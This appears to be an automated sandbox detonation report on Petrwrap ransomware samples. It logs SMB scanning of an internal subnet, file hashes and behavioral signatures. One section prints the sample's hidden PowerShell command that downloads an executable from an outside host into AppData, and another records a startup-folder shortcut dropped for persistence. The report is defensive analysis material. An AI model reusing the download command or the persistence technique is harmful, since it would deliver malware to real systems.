N/A 10.127.0.150:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.0.154:445 tcp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.63:139 tcp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.156:445 tcp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.160:445 tcp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.67:139 tcp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.68:445 tcp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.167:445 tcp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
N/A 10.127.0.167:139 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.71:139 tcp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.72:445 tcp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.72:139 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.173:139 tcp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.75:139 tcp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
N/A 10.127.0.175:139 tcp
N/A 10.127.0.76:445 tcp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.180:139 tcp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.181:139 tcp
N/A 10.127.0.79:139 tcp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.80:445 tcp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.185:139 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.0.187:445 tcp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
N/A 10.127.0.187:139 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.188:445 tcp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.188:139 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.84:445 tcp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.189:139 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.193:139 tcp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.194:139 tcp
N/A 10.127.0.87:445 tcp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.0.88:445 tcp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
N/A 10.127.0.88:139 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.197:139 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.0.200:445 tcp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
N/A 10.127.0.200:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.201:139 tcp
N/A 10.127.0.91:139 tcp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.202:139 tcp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.204:139 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:445 tcp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
N/A 10.127.0.207:139 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.208:445 tcp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.208:139 tcp
N/A 10.127.0.97:445 tcp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.209:139 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.213:139 tcp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.214:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.100:139 tcp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.101:445 tcp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.220:445 tcp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.221:139 tcp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.105:445 tcp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.226:139 tcp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.108:445 tcp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.108:139 tcp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.109:445 tcp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.233:139 tcp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.234:139 tcp
N/A 10.127.0.112:139 tcp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.0.113:445 tcp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
N/A 10.127.0.236:445 tcp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.240:445 tcp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
N/A 10.127.0.240:139 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.116:445 tcp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.241:139 tcp
N/A 10.127.0.242:445 tcp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.242:139 tcp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.243:139 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.244:139 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.245:139 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.246:139 tcp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.247:139 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.248:445 tcp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.248:139 tcp
N/A 10.127.0.249:445 tcp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.249:139 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.250:139 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.251:139 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.252:139 tcp
N/A 10.127.0.253:445 tcp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
N/A 10.127.0.253:139 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.254:139 tcp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.255:139 tcp
N/A 10.127.0.125:445 tcp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
N/A 10.127.1.0:445 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.1.0:139 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.1.1:139 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.2:139 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.3:139 tcp
N/A 10.127.1.4:445 tcp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
N/A 10.127.1.4:139 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.128:139 tcp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
N/A 10.127.1.5:139 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.0.129:445 tcp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
N/A 10.127.1.6:139 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.1.7:139 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.8:139 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.9:139 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.10:139 tcp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.11:139 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.0.132:139 tcp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
N/A 10.127.1.12:139 tcp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
N/A 10.127.1.13:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.1.13:139 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.14:139 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.15:139 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.16:139 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.17:139 tcp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
N/A 10.127.1.18:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.1.18:139 tcp
N/A 10.127.0.136:139 tcp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.19:139 tcp
N/A 10.127.0.137:445 tcp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
N/A 10.127.0.137:139 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.20:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.21:139 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.22:139 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.23:139 tcp
N/A 10.127.1.24:445 tcp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
N/A 10.127.1.24:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.1.25:445 tcp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
N/A 10.127.0.140:139 tcp
N/A 10.127.1.25:139 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.0.141:445 tcp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
N/A 10.127.0.141:139 tcp
N/A 10.127.1.26:139 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.1.27:139 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.28:139 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.29:139 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.30:139 tcp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.31:139 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.144:139 tcp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.32:139 tcp
N/A 10.127.0.145:445 tcp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
N/A 10.127.0.145:139 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.33:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.1.34:139 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.35:139 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.36:139 tcp
N/A 10.127.1.37:445 tcp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
N/A 10.127.1.37:139 tcp
N/A 10.127.1.38:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.1.38:139 tcp
N/A 10.127.0.148:139 tcp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
N/A 10.127.1.39:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.1.39:139 tcp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
N/A 10.127.0.149:139 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.1.40:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.41:139 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.42:139 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.43:139 tcp
SG 20.44.239.154:445 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.44:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.1.45:445 tcp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
N/A 10.127.0.152:139 tcp
N/A 10.127.1.45:139 tcp
N/A 10.127.0.153:445 tcp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
N/A 10.127.1.46:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.1.46:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.155:139 tcp
N/A 10.127.1.47:139 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.48:139 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.49:139 tcp
N/A 10.127.1.50:445 tcp
DE 136.243.69.123:445 tcp
N/A 10.127.1.50:139 tcp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.51:139 tcp
N/A 10.127.0.156:445 tcp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
N/A 10.127.0.156:139 tcp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.52:139 tcp
N/A 10.127.0.157:445 tcp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
N/A 10.127.0.157:139 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.53:139 tcp
US 52.111.227.13:445 nexusrules.officeapps.live.com tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.54:139 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.55:139 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.56:139 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.1.57:445 tcp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
N/A 10.127.1.57:139 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.1.58:445 tcp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
N/A 10.127.0.160:139 tcp
N/A 10.127.1.58:139 tcp
N/A 10.127.1.59:445 tcp
N/A 10.127.0.161:445 tcp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
N/A 10.127.1.59:139 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.1.60:139 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.61:139 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.62:139 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.1.63:139 tcp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.64:139 tcp

Files

memory/5072-0-0x00000000023E0000-0x000000000243E000-memory.dmp

memory/5072-8-0x00000000023E0000-0x000000000243E000-memory.dmp

memory/5072-9-0x00000000023E0000-0x000000000243E000-memory.dmp

memory/5072-11-0x00000000023E0000-0x000000000243E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\56AB.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/5072-22-0x00000000023E0000-0x000000000243E000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240611-en

Max time kernel

1559s

Max time network

1562s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\57618.exe');

Network

Country Destination Domain Proto
US 8.8.8.8:53 french-cooking.com udp
FR 54.36.91.62:80 french-cooking.com tcp

Files

memory/2228-0-0x0000000002860000-0x0000000002880000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1800s

Max time network

1803s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A
File opened for modification C:\Windows\assembly\Desktop.ini C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
